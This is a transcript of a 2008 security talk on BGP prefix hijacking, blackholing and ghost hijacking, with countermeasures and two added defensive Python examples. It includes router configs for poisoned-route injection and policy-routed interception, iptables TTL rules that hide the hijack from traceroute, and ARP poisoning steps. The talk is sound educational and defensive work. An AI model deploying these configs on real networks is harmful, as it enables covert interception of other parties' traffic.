Internet Pirates: blackholing, hijacking and other dirty tricks

Jul 16, 2015

Carlos Fragoso
Page 1:

Wo|man in-the Middle

Page 2:

Pirates of the Internet: Blackholing, hijacking and other dirty tricks

Carlos Fragoso Mariscal

London 2008

Page 3:

Who am I?
•  Information Security Professional
•  Operations and Security Manager for Supercomputing Center of Catalonia – Anella Científica RREN, CATNIX IXP …
•  Technical Director of one eSecurity
•  Involved in several IR communities – ABUSES, TF-CSIRT, NSP-SEC …
•  SANS Volunteer since 2002
•  Cisco Systems and GIAC Certified – CCNA, CCNP*, GSEC, GCFW, GCIH

Page 4:

Pirates of the Internet

Internet 101  Attacks  Countermeasures

Page 5:

Pirates of the Internet

Internet 101: How it works, Threats

Attacks  Countermeasures

Page 6:

How does the Internet work?

Page 7:

Unallocated

Page 8:

Autonomous System

AS Number (ASN)

Network allocations

Page 9:

[Diagram: Carrier, ISP Telco, Enterprise, Cable/DSL Provider, Service Provider]

Page 10:

[Diagram: IXP's, BGPv4 RFC1771, Enterprise, Cable/DSL Provider, Service Provider, ISP Telco, Carrier]

Page 11:

How routing tables work?

BGP  OSPF  ISIS  RIP  Static  Connected

Global

1. Each routing protocol builds its own table based on its metrics
2. Prefixes are elected based on prefix mask and administrative distance
3. Prefixes are installed; more specific prefixes take precedence

Page 12:

BGP Selection Algorithm
1.  Highest Local Preference
2.  Locally originated, aggregated, redistribution…
3.  Shortest AS-PATH
4.  Lowest origin type
5.  Lowest Multi Exit Discriminator (MED)
6.  eBGP over iBGP paths
7.  Lowest IGP metric to next-hop
8.  Received first
… etc.

Any prefix received with the local AS in its AS-Path attribute is dropped

Page 13:

BGP table

BGP table version is NNNNNNNN, local router ID is A.B.C.D
Status codes: s suppressed, d damped, h history, * valid, > best, i - internal, r RIB-failure, S Stale
Origin codes: i - IGP, e - EGP, ? - incomplete

   Network          Next Hop         Metric Path
*  A.B.0.0          10.10.10.1         0    300 200 100 10 i
*                   10.10.20.1         0    300 100 80 i

Global table

Routing entry for A.B.0.0/16
  Known via "bgp 1", distance 20, metric 0
  Tag 7018, type external
  Last update from 10.10.20.1 1d00h ago
  Routing Descriptor Blocks:
  * 10.10.20.1, from 10.10.20.1, 1d00h ago
      Route metric is 0, traffic share count is 1
      AS Hops 3
      Route tag 7018
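The selection steps of slide 12 and its loop-prevention rule, applied to the two candidate paths in the BGP table above, as an added Python example that is not part of the original deck; the local ASN of 1 (the "bgp 1" of the routing entry) is an assumption, and step 2 (locally originated routes) is left out.

```python
from dataclasses import dataclass

LOCAL_AS = 1  # assumption: this router is "bgp 1", as in the deck's routing entry
ORIGIN_RANK = {"i": 0, "e": 1, "?": 2}  # IGP preferred over EGP over incomplete

@dataclass
class Path:
    next_hop: str
    as_path: list           # leftmost ASN = neighbour that sent it, rightmost = origin
    local_pref: int = 100   # IOS default
    origin: str = "i"
    med: int = 0
    ebgp: bool = True
    igp_metric: int = 0

def accepted(path, local_as=LOCAL_AS):
    """Loop prevention: a path whose AS-PATH already carries our own ASN is dropped."""
    return local_as not in path.as_path

def selection_key(path):
    """Sort key for steps 1, 3, 4, 5, 6 and 7 of the deck's list; the smaller tuple wins.
    Step 2 (locally originated routes) is not modelled."""
    return (
        -path.local_pref,          # 1. highest local preference
        len(path.as_path),         # 3. shortest AS-PATH
        ORIGIN_RANK[path.origin],  # 4. lowest origin type
        path.med,                  # 5. lowest MED
        0 if path.ebgp else 1,     # 6. eBGP over iBGP
        path.igp_metric,           # 7. lowest IGP metric to next hop
    )

def best_path(paths, local_as=LOCAL_AS):
    """Return the path that gets installed, or None if every candidate was rejected."""
    candidates = [p for p in paths if accepted(p, local_as)]
    if not candidates:
        return None
    # min() is stable, so on a full tie the earliest path in the list (received first, step 8) wins
    return min(candidates, key=selection_key)

# Constructed candidates mirroring the two entries for A.B.0.0 in the deck's BGP table
CANDIDATES = [
    Path("10.10.10.1", [300, 200, 100, 10]),
    Path("10.10.20.1", [300, 100, 80]),
]

if __name__ == "__main__":
    print(best_path(CANDIDATES))  # 3-hop path via 10.10.20.1, matching the routing entry
```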

Page 14:

Internet Routing Registry (IRR)

•  Route registration database
•  Routing Policy description language (RFC 2622)
•  Common objects – route / route-set – aut-num / AS-Set – peering-set
•  Most well-known – RADB – RIPE

Page 15:

route:     A.B.0.0/19
descr:     Monkey Business
origin:    AS100
mnt-by:    MONKEY-ISP-MNT
source:    RIPE # Filtered

route:     C.D.0.0/24
descr:     Monkey Shop
origin:    AS200
mnt-by:    MONKEY-ISP-MNT
source:    RIPE # Filtered

as-set:          AS-MONKEY-CUSTOMERS
descr:           MONKEY CUSTOMERS
members:         AS100
members:         AS200
members:         AS300
tech-c:          MONK1-RIPE
admin-c:         MONK2-RIPE
mnt-by:          MONKEY-ISP-MNT
source:          RIPE # Filtered

Source: RIPE Whois Database – http://www.ripe.net/db/whois.html

Page 16:

Source: “Stealing the Internet” Defcon Talk – http://www.defcon.org

Page 17:

So it is ...

BGP …vulnerable?

Page 18:

Threats
•  Internet is a chain of trust – “A chain is only as strong as its weakest link”
•  Weak peer filtering policies
•  Unauthorized route IRR registration
•  Routing infrastructure compromise
•  Future BGP peering vulnerabilities

Page 19:

Pirates of the Internet

Internet 101

Attacks: Blackholing / MitM Hijacking / Ghost Hijacking

Countermeasures

Page 20:
Page 21:

Blackholing
•  Poisoning a more specific route – Ex: /24 overlapping main /19
•  Traffic is dropped at destination – Route to Null0
•  Not very effective for small prefixes (</24) – Depends on transit providers' policies

Page 22:

YouTube before BH incident

Source: RIPE-NCC – http://www.ripe.net/news/study-youtube-hijacking.html

Page 23:

YouTube during BH incident

Source: RIPE-NCC – http://www.ripe.net/news/study-youtube-hijacking.html

Page 24:
Page 25:

A.Pilosov

T.Kapela

July 31st – August 2nd 2008 in Las Vegas

Page 26:

MitM Hijacking
•  Victim reconnaissance
•  Attack Engineering
•  Routing Infrastructure compromise
•  Prefix poisoning
•  Traffic interception and abuse
•  Traffic forwarding
•  Obfuscation (optional)

Page 27:

Scream? Don’t you …

Page 28:

[Topology diagram: AS 10, AS 40, AS 20, AS 30, AS 100, AS 60, AS 50, AS 200]

Based on “Stealing the Internet” Defcon Talk – http://www.defcon.org

Page 29:

MitM Hijacking
•  Victim reconnaissance
   –  RR Database objects
   –  Internet topology around it
   –  NOC social engineering
•  Attack Engineering
   –  Plan reply path (take note of ASN's)
   –  Possible points of injection
•  Routing Infrastructure compromise
•  Prefix poisoning
•  Traffic interception and abuse
•  Traffic forwarding
•  Obfuscation (optional)

Page 30:

[Topology diagram: AS 10, AS 40, AS 20, AS 30, AS 100, AS 60, AS 50, AS 200; prefix 1.0.0.0/16]

1. Pirate performs reconnaissance on AS200
3. Pirate compromises routing infrastructure on AS100

Based on “Stealing the Internet” Defcon Talk – http://www.defcon.org

Page 31:

MitM Hijacking
•  Victim reconnaissance
•  Attack Engineering
•  Routing Infrastructure compromise
•  Prefix poisoning
   –  Specific BGP prefix injection
   –  AS-PATH prepend reply path ASN's
   –  Policy routing to nail next-hop on
•  Traffic interception and abuse
•  Traffic forwarding
•  Obfuscation (optional)

Page 32:

Poison Route Injection

ip prefix-list NET A.B.C.0/24
route-map hijacked permit 10
  match ip address prefix-list NET
  set as-path prepend 10 20 200
route-map hijacked permit 20
router bgp 100
  neighbor <AS10_PEER> route-map hijack out

Page 33:

[Topology diagram: AS 10, AS 40, AS 20, AS 30, AS 100, AS 60, AS 50, AS 200]

5. Traffic is abused (i.e. sniffed) and sent back using AS10 (policy routing)
6. Traffic is received by the victim without noticing the abusive activity.

Based on “Stealing the Internet” Defcon Talk – http://www.defcon.org

Page 34:

Policy routing

interface Tunnel10
  description MONKEY-PIRATE
  ip address 10.10.10.1 255.255.255.252
  ip policy route-map BACK
  tunnel source interface Loopback0
  tunnel destination <PIRATE IP>
!
interface FastEthernet0
  description Link to AS10 PROVIDER
  ip address 172.16.1.1 255.255.255.252
!
ip route A.B.C.0 0.0.0.255 10.10.10.2
ip access-list standard NET
  A.B.C.0 0.0.0.255
route-map BACK permit 10
  match ip address NET
  set ip next-hop 172.16.1.2
route-map BACK permit 20

Page 35:

Déjà vu? Isn’t it a…

Page 36:

ARP poisoning attack

[Diagram: 192.168.0.1 (FEEA:FEEA:FEEA), 192.168.0.200 (0001:0236:8624), 192.168.0.20 (000E:3858:AEDE)]

1. IP forwarding and sniffing activation
2. Send spoofed ARP reply (poison), from 0:1:2:36:86:24 to 0:e:38:58:ae:de: arp reply 192.168.0.1 is-at 0:1:2:36:86:24
3. ARP update (poisoned): 192.168.0.1 → 00-01-02-36-86-24
4. Traffic sent to default gateway (00-01-02-36-86-24)
5. Traffic capture and forwarding

Page 37:

MitM Hijacking
•  Victim reconnaissance
•  Attack Engineering
•  Routing Infrastructure compromise
•  Prefix poisoning
•  Traffic interception and abuse
•  Traffic forwarding
•  Obfuscation (optional)

Page 38:

Traceroute before Hijacking

Source: “Stealing the Internet” Defcon Talk – http://www.defcon.org

Page 39:

Traceroute during Hijacking

Source: “Stealing the Internet” Defcon Talk – http://www.defcon.org

Page 40:

Traceroute during Hijacking with TTL additive technique

+ 10

Source: “Stealing the Internet” Defcon Talk – http://www.defcon.org

Page 41:

TTL additive on Linux

iptables -t mangle -I PREROUTING -i eth1 -j TTL --ttl-inc N
iptables -t mangle -I POSTROUTING -o eth1 -j TTL --ttl-inc N
sysctl -w net.ipv4.ip_forward=1

Page 42:
Page 43:
Page 44:

Hands-on Lab
•  GNS3 graphical network simulator
•  Dynamips Cisco IOS emulator
•  Dynagen network configuration generator
•  VMWare Fusion VM's for end nodes

Page 45:
Page 46:

a Ghost? Have you seen …

Page 47:

Ghost Hijacking
•  Unallocated space hijacking
•  Used temporarily by attackers to hide their activity and avoid abuse notifications
•  Nowadays mostly used for spam but could be used for other dirty issues (terrorism)
•  Legal issues: who is responsible for something that doesn’t belong to anyone?

Page 48:

Pirates of the Internet

Internet 101  Attacks  Countermeasures: Protection / Detection / Reaction

Page 49:

ready? Got …

Page 50:

Protection
•  Review and harden your peerings
•  Register and protect your objects on IRR DB
•  Take Routing Registry RIPE-NCC training course – http://www.ripe.net/training/rr/index.html
•  Hide your infrastructure: set up antispoofing (ACL's or RPF) and infrastructure (ACL's) filtering
•  Have beers with other NOC or SOC teams – Why not at a SANS conference? – Join mailing lists instead

Page 51:

Peer route filtering
•  Where?
   –  Customer side
   –  Internet Exchange Points (IXP) / Private peerings
   –  Transit providers
•  What?
   –  Maximum number
   –  AS-Path
   –  Prefixes (static or dynamic)
•  Tips'n'tricks
   –  IRRToolset tool (RIPE-NCC, ISC)
   –  Bogon Route Servers (Cymru)
   –  Secure BGP configuration guides (Cymru, NIST, SANS RR papers)

Page 52:

vigilant? enough…

Page 53:

Detection
•  Alerting Systems
   –  Prefix-based NIDS
•  Tools
   –  RIPE Routing Information Service MyASN – http://www.ris.ripe.net/myasn.html
   –  Prefix Hijack Alert System (PHAS) – http://phas.netsec.colostate.edu/
   –  BGPMon Project – http://bgpmon.net/
   –  University of Roma iBGPPlay – http://ibgplay.caspur.it

Page 54:

Source: RIPE RIS – http://www.ris.ripe.net

Page 55:

Source: Colorado State University – http://netsec.cs.colostate.edu/phas/

Page 56:

Source: BGPmon project – http://bgpmon.net/

Page 57:

BGPmon mail sample

Possible Prefix Hijack (Code: 11)
1 number of peer(s) detected this updates for your prefix A.B.C.0/19:

Update details: 2008-11-11 02:01 (UTC) A.B.C.0/24
Announced by: AS16735 (Companhia de Telecomunicacoes do Brasil Central)
Transit AS: 27664 (CTBC Multimedia)
ASpath: 27664 16735
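An added Python example (not code from the talk) that reads route objects like those on slide 15 and checks observed announcements against them, the way the detection tools and the BGPmon mail above do; the RPSL text, prefixes and ASNs are constructed, since the deck redacts its own as A.B.0.0/19 and C.D.0.0/24. It classifies the three situations the deck describes: a foreign origin AS (the hijack in the mail sample), a more specific announcement from the right origin (the blackholing pattern of slide 21) and an announcement for space nobody registered (ghost hijacking, slide 47).

```python
import ipaddress

# Constructed RPSL text in the style of the deck's RIPE route objects.
# The prefixes and ASNs are placeholders, not the talk's (those were redacted).
ROUTE_OBJECTS = """\
route:     10.10.0.0/19
descr:     Monkey Business
origin:    AS100
mnt-by:    MONKEY-ISP-MNT
source:    RIPE # Filtered

route:     10.20.0.0/24
descr:     Monkey Shop
origin:    AS200
mnt-by:    MONKEY-ISP-MNT
source:    RIPE # Filtered
"""

def parse_route_objects(text):
    """Map each registered route to its origin ASN. Objects are separated by a
    blank line; '#' starts an RPSL comment (the '# Filtered' remark RIPE appends)."""
    registry = {}
    for obj in text.strip().split("\n\n"):
        attrs = {}
        for line in obj.splitlines():
            key, _, value = line.partition(":")
            attrs[key.strip()] = value.split("#", 1)[0].strip()
        if "route" in attrs and "origin" in attrs:
            registry[ipaddress.ip_network(attrs["route"])] = int(attrs["origin"].lstrip("AS"))
    return registry

def classify(announced, as_path, registry):
    """Judge one observed announcement against the registry; the origin is the rightmost ASN."""
    prefix = ipaddress.ip_network(announced)
    origin = as_path[-1]
    covering = [net for net in registry if prefix.subnet_of(net)]
    if not covering:
        return "unregistered"  # nobody registered this space: ghost-hijacking candidate
    net = max(covering, key=lambda n: n.prefixlen)  # most specific registered route
    if registry[net] != origin:
        return f"origin mismatch: AS{origin} announces {prefix}, registered origin is AS{registry[net]}"
    if prefix.prefixlen > net.prefixlen:
        return f"more specific than registered {net}"  # right origin, but a /24 inside a /19 still deserves a look
    return "ok"

REGISTRY = parse_route_objects(ROUTE_OBJECTS)

if __name__ == "__main__":
    # Same shape as the BGPmon alert on the slide: a /24 inside the registered /19 from a foreign origin
    print(classify("10.10.5.0/24", [27664, 16735], REGISTRY))
```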

Page 58:

React!!! Then ...

Page 59:

Reaction
•  Crying and screaming is allowed
•  Contact upstream providers and related mates
   –  If you did, remind them you paid for their beers
   –  iNOC Dial-By-ASN (iNOC-DBA) SIP phone
•  Pray for a prompt response
   –  From hours to days
   –  Depends on how important you are
•  Notify Law Enforcement Organizations (LEO's) if necessary

Page 60:

Internet 101  Attacks  Countermeasures

Page 61:

But what about… …tomorrow?

Page 62:

Secure (origin) BGP
•  Draft on IETF RPSEC Working Group
•  PKI authentication for IP address blocks mapping ASN assignments
•  Digital signature carried over BGP transitive path attribute
•  Verification on external device
•  “Chicken and Egg” problem … waiting for RFC and ISP deployment

Page 63:

Déjà vu? Isn’t it a…

Page 64:

References 1/2

•  “Stealing the Internet” A. Pilosov, T. Kapela – Defcon 16 Conference, http://www.defcon.org/html/links/defcon-media-archives.html#dc_16
•  “BGP Routing Security” D. Wendlandt – Carnegie Mellon University, http://www.cs.cmu.edu/~dwendlan/routing/
•  “BGP Security resources” http://www.bgp4.as/security

Page 65:

References 2/2

•  “BGP Vulnerability Testing” S. Convery, Matthew Franz, http://www.blackhat.com/presentations/bh-usa-03/bh-us-03-convery-franz-v3.pdf
•  “Hacking Cisco Networks Exposed” A. Vladimirov, A. Mikhailovsky – McGraw Hill, ISBN: 0-07-225917-5

Page 66:

THANKS!

[email protected] http://carlos.fragoso.eu

Page 67:

STAY TUNED!